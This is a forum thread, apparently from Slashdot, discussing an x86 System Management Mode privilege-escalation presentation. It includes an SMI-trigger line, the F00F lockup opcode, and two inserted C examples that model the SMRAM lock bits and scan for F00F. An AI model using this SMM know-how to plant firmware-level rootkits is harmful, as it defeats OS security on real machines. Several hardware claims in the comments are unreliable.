The presentation lists events that will trigger a System Management Interrupt (SMI) and enter System Management Mode (SMM). Overheating is only one of them. Another is "century rollover". Taken literally, that would mean that anyone who could set the clock to 11:59 December 31 1999 [I'd say 2000 but I doubt the chip is mathematically correct] can enter SMM without needing physical access to the machine or to the circuit breaker for the air conditioning. Or to use the presentation's example, outl(0xB2, 0x0000000F);.
If I read this problem report correctly, then a process outside of SMM can write to the memory for SMM. (Controlled by the D_OPEN bit in the SMM control register).
So it looks like you can do it without physical access, where "it" is a privilege escalation that *starts* from root. That's getting less absurd all the time as virtualization and technologies like SELinux become more common. Also allows planting a deeper-than-root rootkit. You could escalate to God of Hardware or in the CanSecWest example to "root at securelevel -1".
Maybe I should email Duflot for details and write up something for my nerdish security blog
This vuln doesn't really mean much to general users. However, users who have Intel procs on secure cards (tamper resistant) should worry a bit. Generally, we try to control things on secure cards like thermal leakage (especially key bits).
However, if you attack the driver of a secure card at the same time as you are thermally stressing it, you may be able to take it over, extracting the key data without triggering the tamper evident seals.
Fortunately, security cards that I am familiar with do NOT use Intel processors.
But, as an attack on the "garden variety" home PC, this would be horrible overkill.
Ratboy
Just another "Cubible(sic) Joe" 2 17 3061
I slowly remove my fan on my intel box to see if haxors are going to take over my machi/%"& (connection lost)
In order to form an immaculate member of a flock of sheep one must, above all, be a sheep.
say what ?!
If you can get into the machine to change the fans, you probably don't need to overheat the system to gain control, because you already have control
The Dunning-Kruger effect explains most posts on
I knew there was a reason to use AMD64
There is a D_LCK bit on most chipsets that prevents any software, including BIOS from changing SMM RAM (as the FTA states), unless the CPU is already in SMM mode.
So,
1. BIOS loads its SMM code into SMRAM
2. BIOS locks down SMRAM region (D_LCK bit=1)
3. No Profit for hackers!
This article is just FUD.
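As an added illustration of the D_OPEN/D_LCK mechanism described in the two posts above (the write-once bit the chipset exposes, and the three-step BIOS lock sequence), here is a small C program that is not from the article or from any commenter. It decodes the SMRAMC register byte and models what the lock does to later writes. The bit layout (D_OPEN bit 6, D_CLS bit 5, D_LCK bit 4, G_SMRAME bit 3, C_BASE_SEG bits 2:0) follows the Intel northbridge datasheets of that era; the PCI config offset where the byte lives is chipset specific (assumed here as 0x9D on device 00:00.0 for 8xx/9xx parts, 0x72 on 440BX), and the sample register values are constructed for the example.

```c
/* Added example (not from the article or any commenter): decode the SMRAMC
 * byte Intel northbridges use to gate SMRAM, and model what D_LCK does.
 * Bit layout follows the 82845/82865/915 datasheets; the PCI config offset
 * (0x9D on device 00:00.0 for those parts, 0x72 on 440BX) and the sample
 * values below are assumptions for illustration. */
#include <stdint.h>
#include <stdio.h>

#define SMRAMC_D_OPEN   (1u << 6)  /* 1: SMRAM visible to non-SMM code */
#define SMRAMC_D_CLS    (1u << 5)  /* 1: data accesses go to VGA, code fetches to SMRAM */
#define SMRAMC_D_LCK    (1u << 4)  /* 1: register is read-only until platform reset */
#define SMRAMC_G_SMRAME (1u << 3)  /* 1: SMRAM enabled at all */
#define SMRAMC_C_BASE   0x7u       /* C_BASE_SEG; 010b = A0000h..BFFFFh */

struct smramc {
    int d_open, d_cls, d_lck, g_smrame;
    unsigned base_seg;
};

struct smramc smramc_decode(uint8_t v)
{
    struct smramc s;
    s.d_open   = !!(v & SMRAMC_D_OPEN);
    s.d_cls    = !!(v & SMRAMC_D_CLS);
    s.d_lck    = !!(v & SMRAMC_D_LCK);
    s.g_smrame = !!(v & SMRAMC_G_SMRAME);
    s.base_seg = v & SMRAMC_C_BASE;
    return s;
}

/* Model a write to SMRAMC from outside SMM. Once D_LCK is set the chipset
 * drops further writes until reset, and setting D_LCK forces D_OPEN to 0. */
uint8_t smramc_write(uint8_t current, uint8_t requested)
{
    if (current & SMRAMC_D_LCK)
        return current;                        /* locked: write ignored */
    if (requested & SMRAMC_D_LCK)
        requested &= (uint8_t)~SMRAMC_D_OPEN;  /* locking closes the window */
    return requested;
}

/* The question the thread argues about: can ring-0 code reach SMRAM? */
int smram_writable_from_os(uint8_t v)
{
    struct smramc s = smramc_decode(v);
    if (!s.g_smrame)
        return 0;          /* no SMRAM mapped at all */
    if (s.d_open)
        return 1;          /* BIOS left it open: writable right now */
    return !s.d_lck;       /* closed but unlocked: attacker can set D_OPEN */
}

static void report(const char *label, uint8_t v)
{
    struct smramc s = smramc_decode(v);
    printf("%-18s 0x%02X  D_OPEN=%d D_LCK=%d G_SMRAME=%d base=%u  -> %s\n",
           label, v, s.d_open, s.d_lck, s.g_smrame, s.base_seg,
           smram_writable_from_os(v) ? "EXPOSED to ring 0" : "protected");
}

int main(void)
{
    /* constructed sample bytes: a BIOS that locked SMRAM and one that did not */
    uint8_t locked = 0x1A, unlocked = 0x0A;
    report("BIOS locked", locked);
    report("BIOS forgot lock", unlocked);
    /* an attacker in ring 0 tries to set D_OPEN (0x4A) against each */
    report("after attack", smramc_write(locked, 0x4A));
    report("after attack", smramc_write(unlocked, 0x4A));
    return 0;
}
```

On a Linux box with pciutils you can read the real byte with `setpci -s 00:00.0 0x9d.b` (offset assumed as in the lead-in) and feed it to smramc_decode(); a clear D_LCK means the BIOS has left the door the presentation describes open to any ring-0 code, which is exactly the D_OPEN path the earlier post mentions.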
On a similar tip, the old BBC ModelB Micro (I think it was the B) came with a NiCad battery as an option to keep the system clock running while not in use. It was considered very flash at the time but there was a serious problem. The recharging circuit was under software control and it was very simple to hack into the kernel and just tell the battery to charge permanently. If you do that to a NiCad sooner or later it either explodes or catches on fire which happened at least once I believe in the UK. Can't find any links about this now, I remember it from the time.
spoonerize "magic trackpad"
This would be a great vector to allow debugger-class access while a secure program is running. Think about it, a DRM protected program can do all it wants to prevent other programs poking around its memory space. Signed ring 0 device drivers are certified to not poke around in DRM protected software. This is another source of unsigned code that you can trigger whenever you like. Attacking the BIOS was the path to hacking the XBOX, and this could be the way into Vista-generation protection. Just think, you could modchip your own PC!
I didn't say burn, I said overheat. As the machine that reached 100 °C (boiling for water) was still in use up to last week when I upgraded, I'd say that it's a pretty hardy little chip...
It *did* definitely start flaking out before I rebooted and found it at such high temperatures... so I doubt that long-term use at such temperatures would be good for any CPU, even AMD
What the replies here (and I think the presentation to some extent) have missed is that SMM isn't ring 0, it's ring -1. In SMM you can do things that the processor hardware normally prevents, like creating invalid/illogical page table entries. Since SMM bypasses any hardware-enforced checks, you can set the processor up to do... surprising things. This security risk was AFAIK first discussed in http://www.amazon.com/gp/product/0387953876/sr=8-1/qid=1144813279/ref=sr_1_1/102-2091912-1657751?_encoding=UTF8
Umm...
Interesting. If the universe was really just a program running on some sort of 'god machine' and you could get low-enough level access to the physics (the ability to tweak individual bits), and if the 'god machine' had a hardware vulnerability under specific conditions, maybe with a big enough explosion you could overflow something, gain 'ring -1' access, and re-write reality.
Just a thought...
Actually, the last byte can be any value from C8 to CF. The mnemonic for the F0 0F C7 C8 instruction would be "lock cmpxchg8b eax". Specifying any register as a parameter to cmpxchg8b is illegal, and it's the "lock" combined with the delayed illegal opcode exception that confuses the Pentium 1 into freezing. C8...CF specify that the parameter is one of the 8 main registers.
Melissa
"Screw Sun, cross-platform will never work. Let's move on and steal the Java language." - Visual J++ Product Manager
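As an added example that is not from the thread, the following C code decodes the byte sequence the post above discusses (F0 0F C7 C8..CF) and shows, via the ModRM field layout, why exactly those final bytes are the Pentium "F00F" pattern. It only classifies bytes and never executes them; the buffer in main() is constructed for the example, and the function and enum names are this example's own.

```c
/* Added example, not from the thread: decode the byte sequence the comment
 * above discusses (F0 0F C7 C8..CF) and show why exactly those ModRM bytes
 * are the Pentium "F00F" pattern. It only classifies bytes; it does not
 * execute them. Buffer contents in main() are constructed for illustration. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

enum f00f_class {
    NOT_CMPXCHG8B,          /* something else entirely */
    CMPXCHG8B_MEM,          /* legal cmpxchg8b m64 (with or without LOCK) */
    CMPXCHG8B_REG_INVALID,  /* register operand: #UD, but handled normally */
    F00F_LOCKUP             /* LOCK + register operand: hangs a flawed P5 */
};

/* Classify the instruction starting at p (len bytes available). */
enum f00f_class classify_f00f(const uint8_t *p, size_t len)
{
    size_t i = 0;
    int lock = 0;

    if (len > 0 && p[0] == 0xF0) {      /* LOCK prefix */
        lock = 1;
        i = 1;
    }
    if (len < i + 3 || p[i] != 0x0F || p[i + 1] != 0xC7)
        return NOT_CMPXCHG8B;

    /* ModRM: mod (bits 7:6), reg (5:3), rm (2:0). cmpxchg8b is 0F C7 /1,
     * i.e. reg field 001; it requires a memory operand (mod != 11). */
    uint8_t modrm = p[i + 2];
    unsigned mod = modrm >> 6;
    unsigned reg = (modrm >> 3) & 7;

    if (reg != 1)
        return NOT_CMPXCHG8B;           /* other /r values are not cmpxchg8b */
    if (mod != 3)
        return CMPXCHG8B_MEM;           /* e.g. C7 08 = cmpxchg8b [eax] */

    /* mod=11 with reg=001 gives exactly C8..CF: rm selects one of the
     * eight general registers, which cmpxchg8b cannot take. Alone that is
     * a clean #UD; with LOCK in front it is the lockup sequence. */
    return lock ? F00F_LOCKUP : CMPXCHG8B_REG_INVALID;
}

/* Scan a buffer (e.g. a downloaded binary) for the lockup sequence.
 * Returns the offset of the first hit, or -1 if none. */
long find_f00f(const uint8_t *buf, size_t len)
{
    for (size_t off = 0; off + 4 <= len; off++)
        if (classify_f00f(buf + off, len - off) == F00F_LOCKUP)
            return (long)off;
    return -1;
}

int main(void)
{
    /* constructed: padding, a legal locked cmpxchg8b [eax], then F0 0F C7 C8 */
    const uint8_t sample[] = { 0x90, 0x90, 0xF0, 0x0F, 0xC7, 0x08,
                               0xF0, 0x0F, 0xC7, 0xC8, 0x90 };
    long off = find_f00f(sample, sizeof sample);
    printf("first F00F sequence at offset %ld\n", off);
    return 0;
}
```

The scanner is the shape of the old "F00F detector" tools: it does not try to disassemble the whole file, it just refuses to let the one sequence through. A real scanner also has to consider operand-size and segment prefixes between the LOCK and the 0F, which this example leaves out.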
Maybe the quantization of the universe and its accompanying randomness are caused by floating point roundoff error in the god machine?
Melissa
How are you able to do any of those sequences of operations if you are not *already* executing as root or as ring 0? If you already have control of ring 0 and/or root, you can do what you want to the computer already. SMM doesn't get you anything special, except perhaps the ability to mess with internal processor states you can't normally (make writable code segments in protected mode, for example).
By the way, whenever the CPU does a memory read or write while in SMM, it asserts the SMM# pin. This means that the hardware is fully able to consider SMM RAM to be totally separate from the main memory space - but most implementations don't. In fact, SMM has an instruction called "umov" that allows SMM hypervisors to read/write the main memory space. (umov is equivalent to mov when not in SMM.)
If it's *really* a problem, change the motherboard, not the CPU. The motherboard can physically lock out the SMM memory space from even kernel programs if it so desires.
Melissa
I mean .... we should store all these people in big buildings, shove big hard problems in one end and see what comes out the other.
Stuff jail, send them to a big think tank, make em work for their crimes.
EMail: 0110001101100010010000000110001101110010 0110000101111010011011100110000101110010 0010111001100011011011110110
> - The article states that all x86 processors "could" be vulnerable. Does that
> mean the *entire* series of Pentium chips, even the older PIII and PII's? If so,
> are they equally as easy to compromise as the modern versions?
If so, is the "Intel 386 EX" processor in Diebold voting machines vulnerable?
Vote early, vote often!